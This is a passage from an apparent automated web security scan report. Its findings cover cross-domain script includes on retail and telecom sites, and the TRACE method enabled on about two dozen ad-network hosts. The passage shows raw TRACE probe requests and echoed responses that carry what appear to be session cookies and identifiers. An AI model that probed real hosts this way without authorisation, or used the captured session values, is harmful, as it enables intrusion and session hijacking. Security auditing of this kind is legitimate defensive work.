Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 223220
Expires: Thu, 16 Jun 2011 12:15:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:15:46 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226545942%3a%3bC25%5fEXP%3d1360066545%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:15:45 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=QolLt0HmGKtgnMXrHDVRUVhne1g%3d%0a%3b2011%2d06%2d16+08%3a15%3a45%2e967%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:19:13 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230145967%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cOvVzEI6Oajqj7Z9XG6ty%2bZOWJoA%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...
<script type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...

16.87. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Navigation

Issue detail

The response dynamically includes the following script from another domain:

https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

Response

16.88. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The response dynamically includes the following script from another domain:

https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224033585%3a%3bC25%5fEXP%3d1360064033%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227633772%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2crM8xlAEyyjuzBc2ZPDgFJlhwFMM%3d

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:34:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:34:59 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224094066%3a%3bC25%5fEXP%3d1360064094%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:34:54 GMT;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%243%2c798%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816094%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224094066%3a%3bC25%5fEXP%3d1360064094%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:34:54 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227694814%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cufvYdumw7ZxHWtTtpzjDpT0%2bqW0%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<script type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...

16.89. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/ProductDisplay

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

Response

16.90. http://www.ilslaunch.com/mission-control/mission-skyterra-1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ilslaunch.com
Path:	/mission-control/mission-skyterra-1

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/sharethis.js

Request

GET /mission-control/mission-skyterra-1 HTTP/1.1
Host: www.ilslaunch.com
Proxy-Connection: keep-alive
Referer: http://www.lightsquared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8d393e05f9096e5159d3f1d85acb4aa2=663g8gh6rfesig5han0apvb014

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:50:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 16 Jun 2011 10:50:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
</div>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=9195da24-0bcd-4ebe-a8ce-e3d41c256d61&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

16.91. http://www.lightsquared.com/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightsquared.com
Path:	/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/sharethis.js

Request

GET /press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/ HTTP/1.1
Host: www.lightsquared.com
Proxy-Connection: keep-alive
Referer: http://www.lightsquared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o8lr5d4di75ipopo7a9ll7olo7; __utmz=243918744.1308221421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243918744.800402778.1308221421.1308221421.1308221421.1; __utmc=243918744; __utmb=243918744.4.10.1308221421

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:51:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.lightsquared.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<li class="social">
<script src="http://w.sharethis.com/button/sharethis.js#publisher=1db82361-4e88-4f17-b9e4-35ef39033616&type=website&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine" type="text/javascript"></script>
...[SNIP]...

16.92. http://www.lightsquared.com/uncategorized/welcome-to-insights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightsquared.com
Path:	/uncategorized/welcome-to-insights/

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/buttons.js

Request

GET /uncategorized/welcome-to-insights/ HTTP/1.1
Host: www.lightsquared.com
Proxy-Connection: keep-alive
Referer: http://www.lightsquared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o8lr5d4di75ipopo7a9ll7olo7; __utmz=243918744.1308221421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243918744.800402778.1308221421.1308221421.1308221421.1; __utmc=243918744; __utmb=243918744.3.10.1308221421

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.lightsquared.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
</div>

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

17. TRACE method is enabled previous next
There are 27 instances of this issue:

http://ads.cleveland.com/
http://ads.nj.com/
http://ads.oregonlive.com/
http://ads1.msn.com/
http://am.nexac.com/
http://amch.questionmarket.com/
http://cache.specificmedia.com/
http://cheetah.vizu.com/
http://dsp.adledge.com/
http://image2.pubmatic.com/
http://login.dotomi.com/
http://matcher-apx.bidder7.mookie1.com/
http://matcher.bidder7.mookie1.com/
http://matcher.bidder8.mookie1.com/
http://optimized-by.rubiconproject.com/
http://pixel.everesttech.net/
http://pixel.rubiconproject.com/
http://puma.vizu.com/
http://rt.legolas-media.com/
http://secure-us.imrworldwide.com/
http://spotlight.creditcards.com/
http://t.mookie1.com/
http://tacoda.at.atwola.com/
http://tap.rubiconproject.com/
http://tracking.hubspot.com/
http://www.lightsquared.com/
http://www.nutter.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

17.1. http://ads.cleveland.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.cleveland.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads.cleveland.com
Cookie: c77ea5e55b7e4d10

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:08:39 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:18:39 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: ads.cleveland.com
Cookie: c77ea5e55b7e4d10; NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660; crtg=0
Connection: Keep-Alive
OAS_IP: 173.193.214.243

17.2. http://ads.nj.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nj.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads.nj.com
Cookie: 6806db3ff839f0b8

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:09:04 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:04 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: ads.nj.com
Cookie: 6806db3ff839f0b8; crtg=0; NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660
Connection: Keep-Alive
OAS_IP: 173.193.214.243

17.3. http://ads.oregonlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.oregonlive.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads.oregonlive.com
Cookie: 980c0c827020c5a5

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:09:17 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:17 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: ads.oregonlive.com
Cookie: 980c0c827020c5a5; NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660; crtg=0
Connection: Keep-Alive
OAS_IP: 173.193.214.243

17.4. http://ads1.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads1.msn.com
Cookie: a80f6beba29a198d

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Thu, 16 Jun 2011 11:25:58 GMT
Content-Type: message/http
Content-Length: 598
Expires: Thu, 16 Jun 2011 11:25:58 GMT
Connection: close

TRACE / HTTP/1.0
Host: ads1.msn.com
Cookie: a80f6beba29a198d; MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; mh=MSFT; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_44310
...[SNIP]...

17.5. http://am.nexac.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://am.nexac.com
Path:	/

Request

TRACE / HTTP/1.0
Host: am.nexac.com
Cookie: 9f751ea1af8d0240

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:11:18 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: am.nexac.com
Cookie: 9f751ea1af8d0240; na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

17.6. http://amch.questionmarket.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 7f0598919cbd5b9b

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:53:18 GMT
Server: Apache/2.2.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 7f0598919cbd5b9b; CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354
...[SNIP]...

17.7. http://cache.specificmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: d60dabcd4edc60e3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 14:39:50 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n30 ( origin>CONN)
Content-Length: 390
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: ads.specificmedia.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n30.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.40
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cache.specificmedia.com/
Cookie: d60dabcd4edc60e3; smu=5017.4379975540045122119
Connection: keep-alive

17.8. http://cheetah.vizu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cheetah.vizu.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cheetah.vizu.com
Cookie: a7209095323f19cb

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:16 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n33 ( origin>CONN)
Content-Length: 375
Content-Type: message/http
Connection: close

TRACE /ie/ HTTP/1.1
Host: adcatalyst.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n33.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.43
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cheetah.vizu.com/
Cookie: a7209095323f19cb; ptc=1879%3D728x90-1
Connection: keep-alive

17.9. http://dsp.adledge.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dsp.adledge.com
Path:	/

Request

TRACE / HTTP/1.0
Host: dsp.adledge.com
Cookie: 8894b7f899f7acdf

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:08:20 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dsp.adledge.com
Cookie: 8894b7f899f7acdf

17.10. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 316eca8a72c92f43

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:08:19 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 316eca8a72c92f43; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_133
...[SNIP]...

17.11. http://login.dotomi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/

Request

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: a7171f54aa388c6d

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: a7171f54aa388c6d; Apache=173.193.214.243.1308223637804902; DotomiUser=330100732990473967$0$335422886; DotomiRR2339=-1$3$1$; rt_1982=2; le_9109=7; DotomiSession_2339=2_371600778172398468$330100732990473967$335422886$13
...[SNIP]...

17.12. http://matcher-apx.bidder7.mookie1.com/ previous next

Summary

